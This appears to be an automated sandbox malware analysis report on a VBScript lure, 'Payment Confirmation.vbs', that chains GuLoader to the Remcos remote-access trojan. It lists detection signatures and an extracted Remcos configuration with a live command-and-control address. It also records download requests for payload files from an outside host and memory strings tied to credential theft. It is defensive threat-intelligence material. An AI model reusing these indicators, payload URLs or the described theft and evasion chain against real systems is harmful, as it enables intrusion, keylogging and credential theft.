Windows Analysis Report
Payment Confirmation.vbs

Overview

General Information

Sample name: Payment Confirmation.vbs
Analysis ID: 1465864
MD5: f72a6162ebf2a0efc89edbbff12cf158
SHA1: 89d7535775bac5a07d9ae7e76e9b397541c0265b
SHA256: 12c916ad80fea271f8d47a0277ce8a8c2090c428adcf2ec538f9f6b6e6d91aea
Tags: GuLoaderRATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Found malware configuration
Source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.161:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KECL2I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara detected Remcos RAT
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1767599813.000000000726E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbD source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_20DE10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_20DE6580 FindFirstFileExA, 10_2_20DE6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407898

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 103.237.87.161
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:60022 -> 103.237.87.161:1993
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Daguerreotypiernes.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nsQUkTChtPKgp70.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: global traffic HTTP traffic detected: GET /Daguerreotypiernes.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nsQUkTChtPKgp70.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, 0000000B.00000002.1849155976.0000000004689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 0000000B.00000002.1849155976.0000000004689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.2670641426.0000000021220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.2670641426.0000000021220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.2
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.23
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.8
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.2
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.24
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1811161697.00000258E7803000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1811161697.00000258E6129000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/D
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Da
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Dag
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Dagu
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Dague
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguer
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerr
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerre
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreo
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreot
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreoty
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotyp
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypi
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypie
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypier
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiern
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypierne
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.f
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.fl
Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.fla
Source: powershell.exe, 00000002.00000002.1811161697.00000258E6129000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaP
Source: powershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaSunvider
Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaXR
Source: powershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Daguerreotypiernes.flaeters
Source: wab.exe, 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2648876341.00000000009F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/nsQUkTChtPKgp70.bin
Source: powershell.exe, 00000002.00000002.1811161697.00000258E7803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237H
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: powershell.exe, 00000005.00000002.1767599813.0000000007240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: wscript.exe, 00000000.00000003.1366662376.00000291C3FBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1366662376.00000291C3FBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/N
Source: wscript.exe, 00000000.00000002.1374823371.00000291C219C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373658908.00000291C218F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1367319051.00000291C2211000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?de1648c5cc022
Source: wscript.exe, 00000000.00000003.1373805835.00000291C21B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373658908.00000291C218F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1374863490.00000291C21B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabR
Source: wscript.exe, 00000000.00000002.1374823371.00000291C219C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373658908.00000291C218F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmeB
Source: wscript.exe, 00000000.00000003.1367225392.00000291C3F81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367762255.00000291C3FA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367386593.00000291C3FA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?de1648c5cc
Source: wab.exe, 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2645737177.0000000000888000.00000004.00000020.00020000.00000000.sdmp, bhvB28E.tmp.11.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpHz
Source: powershell.exe, 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://ocspx.digicert.com0E
Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1811161697.00000258E5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1762762015.00000000049B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvB28E.tmp.11.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 0000000D.00000002.1834909527.000000000381D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000000D.00000002.1834909527.000000000381D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comata
